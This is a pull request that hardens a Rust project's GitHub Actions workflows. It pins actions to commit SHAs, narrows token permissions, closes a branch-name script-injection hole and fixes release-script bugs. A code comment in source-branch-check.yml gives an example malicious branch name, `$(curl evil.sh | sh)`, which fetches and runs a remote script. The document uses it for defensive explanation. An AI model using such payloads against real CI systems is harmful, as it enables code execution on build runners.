### PR TITLE
fix(ci): SHA-pin actions, least-privilege permissions, fix release-create bugs

### DIFF
--- a/.github/workflows/checks/changelog-check.yml
+++ b/.github/workflows/checks/changelog-check.yml
@@ -11,6 +11,10 @@ on:
         required: true
         type: string
 
+# Least-privilege default: this check only inspects the PR body text.
+permissions:
+  contents: read
+
 jobs:
   changelog:
     name: Check changelog

--- a/.github/workflows/checks/source-branch-check.yml
+++ b/.github/workflows/checks/source-branch-check.yml
@@ -7,16 +7,24 @@ name: Source Branch Check
 on:
   workflow_call:
 
+# Least-privilege default: this check only reads the PR's branch name.
+permissions:
+  contents: read
+
 jobs:
   source-branch:
     name: Check source branch
     runs-on: ubuntu-latest
     steps:
       - name: Verify PR is from main
+        env:
+          # Passed through an env var, not interpolated directly into the
+          # script: the branch name is attacker-controlled (anyone can open
+          # a PR with a crafted branch name like `$(curl evil.sh | sh)`),
+          # so it must never be substituted straight into a shell script.
+          SOURCE: ${{ github.event.pull_request.head.ref }}
         run: |
           set -euo pipefail
-
-          SOURCE="${{ github.event.pull_request.head.ref }}"
 
           if [ "$SOURCE" != "main" ]; then
             echo "::error::Release PRs must come from the 'main' branch, not '${SOURCE}'"

--- a/.github/workflows/checks/version-bump-check.yml
+++ b/.github/workflows/checks/version-bump-check.yml
@@ -11,12 +11,16 @@ name: Version Bump Check
 on:
   workflow_call:
 
+# Least-privilege default: this check only reads the repo to diff versions.
+permissions:
+  contents: read
+
 jobs:
   version-bump:
     name: Check version bumps
     runs-on: ubuntu-latest
     steps:
-      - uses: actions/checkout@v4
+      - uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
         with:
           fetch-depth: 0
 

--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -6,6 +6,11 @@ on:
   pull_request:
     branches: [main]
 
+# Least-privilege default: this workflow only reads the repo and runs local
+# checks, it never pushes, comments, or touches releases.
+permissions:
+  contents: read
+
 env:
   CARGO_TERM_COLOR: always
   RUST_BACKTRACE: 1
@@ -15,9 +20,9 @@ jobs:
     name: Check
     runs-on: ubuntu-latest
     steps:
-      - uses: actions/checkout@v4
-      - uses: dtolnay/rust-toolchain@stable
-      - uses: Swatinem/rust-cache@v2
+      - uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
+      - uses: dtolnay/rust-toolchain@4be7066ada62dd38de10e7b70166bc74ed198c30 # stable
+      - uses: Swatinem/rust-cache@e18b497796c12c097a38f9edb9d0641fb99eee32 # v2
       - name: Check
         run: cargo check --workspace --all-targets
 
@@ -25,9 +30,9 @@ jobs:
     name: Test
     runs-on: ubuntu-latest
     steps:
-      - uses: actions/checkout@v4
-      - uses: dtolnay/rust-toolchain@stable
-      - uses: Swatinem/rust-cache@v2
+      - uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
+      - uses: dtolnay/rust-toolchain@4be7066ada62dd38de10e7b70166bc74ed198c30 # stable
+      - uses: Swatinem/rust-cache@e18b497796c12c097a38f9edb9d0641fb99eee32 # v2
       - name: Run tests
         run: cargo test --workspace
 
@@ -35,9 +40,9 @@ jobs:
     name: APS Standards Validation
     runs-on: ubuntu-latest
     steps:
-      - uses: actions/checkout@v4
-      - uses: dtolnay/rust-toolchain@stable
-      - uses: Swatinem/rust-cache@v2
+      - uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
+      - uses: dtolnay/rust-toolchain@4be7066ada62dd38de10e7b70166bc74ed198c30 # stable
+      - uses: Swatinem/rust-cache@e18b497796c12c097a38f9edb9d0641fb99eee32 # v2
       - name: Build CLI
         run: cargo build -p aps-cli --release
       - name: Validate all V1 standards
@@ -57,11 +62,11 @@ jobs:
     name: Clippy
     runs-on: ubuntu-latest
     steps:
-      - uses: actions/checkout@v4
-      - uses: dtolnay/rust-toolchain@stable
+      - uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
+      - uses: dtolnay/rust-toolchain@4be7066ada62dd38de10e7b70166bc74ed198c30 # stable
         with:
           components: clippy
-      - uses: Swatinem/rust-cache@v2
+      - uses: Swatinem/rust-cache@e18b497796c12c097a38f9edb9d0641fb99eee32 # v2
       - name: Clippy
         run: cargo clippy --workspace --all-targets -- -D warnings
 
@@ -69,8 +74,8 @@ jobs:
     name: Format
     runs-on: ubuntu-latest
     steps:
-      - uses: actions/checkout@v4
-      - uses: dtolnay/rust-toolchain@stable
+      - uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
+      - uses: dtolnay/rust-toolchain@4be7066ada62dd38de10e7b70166bc74ed198c30 # stable
         with:
           components: rustfmt
       - name: Check formatting

--- a/.github/workflows/release-create.yml
+++ b/.github/workflows/release-create.yml
@@ -27,8 +27,10 @@ on:
   push:
     branches: [release]
 
+# Least-privilege default: only the create-release job pushes tags and
+# creates a GitHub Release, so only it declares contents: write below.
 permissions:
-  contents: write
+  contents: read
 
 jobs:
   # ---------------------------------------------------------------------------
@@ -37,6 +39,8 @@ jobs:
   detect-changes:
     name: Detect version changes
     runs-on: ubuntu-latest
+    permissions:
+      contents: read
     outputs:
       system_changed: ${{ steps.detect.outputs.system_changed }}
       system_version: ${{ steps.detect.outputs.system_version }}
@@ -45,7 +49,7 @@ jobs:
       tag_list: ${{ steps.detect.outputs.tag_list }}
       has_changes: ${{ steps.detect.outputs.has_changes }}
     steps:
-      - uses: actions/checkout@v4
+      - uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
         with:
           fetch-depth: 0
 
@@ -131,7 +135,7 @@ jobs:
           # Standards
           for dir in standards/v1/APS-V1-*; do
             [ -d "$dir" ] || continue
-            id=$(basename "$dir" | sed 's/-.*//' | sed 's/APS-V1-//')
+            id=$(basename "$dir" | sed -E 's/^APS-V1-([0-9]+)-.*/\1/')
             slug=$(basename "$dir" | sed 's/^APS-V1-[0-9]*-//')
             crate_name="apss-v1-${id}-${slug}"
             tag_prefix="APS-V1-${id}"
@@ -180,9 +184,11 @@ jobs:
             detect_crate "$dir" "experiment.toml" "$exp_name" "$exp_name" "3"
           done
 
-          # Bootstrap binary
+          # Bootstrap binary. Its Cargo.toml uses `version.workspace = true`,
+          # not a literal version string, so its version is always the
+          # system version computed above, never grepped from its own file.
           if [ -d "crates/apss-bootstrap" ] && ! git diff --quiet "$BASE" HEAD -- "crates/apss-bootstrap" 2>/dev/null; then
-            BOOT_VER=$(grep '^version' crates/apss-bootstrap/Cargo.toml | head -1 | sed 's/.*= *"\(.*\)"/\1/')
+            BOOT_VER="$SYSTEM_VERSION"
             if [ -n "$BOOT_VER" ]; then
               echo "  Changed: apss (bootstrap) @ $BOOT_VER (tier 4)"
               CHANGED_CRATES=$(echo "$CHANGED_CRATES" | jq --arg ver "$BOOT_VER" \
@@ -210,10 +216,13 @@ jobs:
           echo "Tags: $TAG_LIST"
           echo "Changed crates: $(echo "$CHANGED_CRATES" | jq -c '.')"
 
-          # Set outputs
+          # Set outputs. changed_crates must be compacted to one line: the
+          # GITHUB_OUTPUT file format requires single-line values for a plain
+          # key=value entry, and jq pretty-prints by default, so writing the
+          # multi-line $CHANGED_CRATES directly corrupts the output file.
           echo "system_changed=$SYSTEM_CHANGED" >> "$GITHUB_OUTPUT"
           echo "system_version=$SYSTEM_VERSION" >> "$GITHUB_OUTPUT"
-          echo "changed_crates=$CHANGED_CRATES" >> "$GITHUB_OUTPUT"
+          echo "changed_crates=$(echo "$CHANGED_CRATES" | jq -c '.')" >> "$GITHUB_OUTPUT"
           echo "standards_changed=$STANDARDS_CHANGED" >> "$GITHUB_OUTPUT"
           echo "tag_list=$TAG_LIST" >> "$GITHUB_OUTPUT"
           echo "has_changes=$HAS_CHANGES" >> "$GITHUB_OUTPUT"
@@ -229,7 +238,7 @@ jobs:
     permissions:
       contents: write
     steps:
-      - uses: actions/checkout@v4
+      - uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
         with:
           fetch-depth: 0
 
@@ -309,10 +318,12 @@ jobs:
     if: needs.detect-changes.outputs.system_changed == 'true' || needs.detect-changes.outputs.standards_changed == 'true'
     runs-on: ubuntu-latest
     environment: release-publish
+    permissions:
+      contents: read
     steps:
-      - uses: actions/checkout@v4
-      - uses: dtolnay/rust-toolchain@stable
-      - uses: Swatinem/rust-cache@v2
+      - uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
+      - uses: dtolnay/rust-toolchain@4be7066ada62dd38de10e7b70166bc74ed198c30 # stable
+      - uses: Swatinem/rust-cache@e18b497796c12c097a38f9edb9d0641fb99eee32 # v2
 
       - name: Publish APSS crates
         env:

--- a/.github/workflows/release-gate.yml
+++ b/.github/workflows/release-gate.yml
@@ -47,11 +47,11 @@ jobs:
     name: Full QA
     runs-on: ubuntu-latest
     steps:
-      - uses: actions/checkout@v4
-      - uses: dtolnay/rust-toolchain@stable
+      - uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
+      - uses: dtolnay/rust-toolchain@4be7066ada62dd38de10e7b70166bc74ed198c30 # stable
         with:
           components: clippy, rustfmt
-      - uses: Swatinem/rust-cache@v2
+      - uses: Swatinem/rust-cache@e18b497796c12c097a38f9edb9d0641fb99eee32 # v2
 
       - name: Format check
         run: cargo fmt --all -- --check
@@ -75,9 +75,9 @@ jobs:
     name: APS Standards Validation
     runs-on: ubuntu-latest
     steps:
-      - uses: actions/checkout@v4
-      - uses: dtolnay/rust-toolchain@stable
-      - uses: Swatinem/rust-cache@v2
+      - uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
+      - uses: dtolnay/rust-toolchain@4be7066ada62dd38de10e7b70166bc74ed198c30 # stable
+      - uses: Swatinem/rust-cache@e18b497796c12c097a38f9edb9d0641fb99eee32 # v2
 
       - name: Build CLI
         run: cargo build -p aps-cli --release
@@ -107,8 +107,8 @@ jobs:
     name: Cargo Audit
     runs-on: ubuntu-latest
     steps:
-      - uses: actions/checkout@v4
-      - uses: dtolnay/rust-toolchain@stable
+      - uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
+      - uses: dtolnay/rust-toolchain@4be7066ada62dd38de10e7b70166bc74ed198c30 # stable
       - name: Install cargo-audit
         run: cargo install cargo-audit
       - name: Run audit
@@ -118,9 +118,9 @@ jobs:
     name: Dependency Review
     runs-on: ubuntu-latest
     steps:
-      - uses: actions/checkout@v4
+      - uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
       - name: Dependency Review
-        uses: actions/dependency-review-action@v4
+        uses: actions/dependency-review-action@2031cfc080254a8a887f58cffee85186f0e49e48 # v4.9.0
 
   # ---------------------------------------------------------------------------
   # Aggregator — required status check for branch protection


### PR DESCRIPTION
## Summary

While bootstrapping the release pipeline for the very first time (see #93), I ran a security audit and simulated `release-create.yml`'s detect-changes script locally before trusting it in CI. Found real issues in both categories.

### Security hardening
- SHA-pin every `uses:` action reference (30 lines across ci.yml, release-gate.yml, release-create.yml, checks/*.yml). Mutable tags can be silently repointed to a malicious commit.
- Fix a script-injection vector in `source-branch-check.yml`: the PR's head branch name (attacker-controlled) was interpolated directly into a shell script. Now passed through an env var.
- Add `permissions: contents: read` to `ci.yml` and the three `checks/*.yml` reusable workflows (previously missing).
- Scope `release-create.yml`'s permissions from a blanket `contents: write` down to `contents: read`, with only the tag/release-creating job declaring write.
- `actions/dependency-review-action@v4` referenced a tag that doesn't exist on that repo (no floating `v4`) and would have failed at runtime; pinned to v4.9.0's SHA.

### Real bugs in release-create.yml (would have broken the very first release)
- Standard ID extraction cut at the first hyphen in `APS-V1-0000-meta`, producing `APS` instead of `0000`. Every crate name and tag was corrupted (e.g. `apss-v1-APS-meta`).
- The bootstrap binary's version was grepped from its own `Cargo.toml`, but that crate uses `version.workspace = true` with no literal version string, so the grep captured the inheritance line itself as a "version."
- The changed-crates JSON output is multi-line (jq's default pretty-print) but was written to `$GITHUB_OUTPUT` as a plain `key=value` line, which GitHub Actions requires to be single-line. This broke the workflow the moment more than one crate changed.

All three bugs were confirmed by extracting the actual script and running it locally against this repo's real git history, both before and after the fix.

## Test plan
- [x] `actionlint` clean (only two pre-existing cosmetic shellcheck style notes remain, unrelated to security)
- [x] All YAML files parse
- [x] Simulated `release-create.yml`'s detect-changes script locally, confirmed correct crate names/tags/versions against this repo's actual state
- [x] Simulated `changelog-check.yml` and `source-branch-check.yml` locally, confirmed correct behavior including injection-safety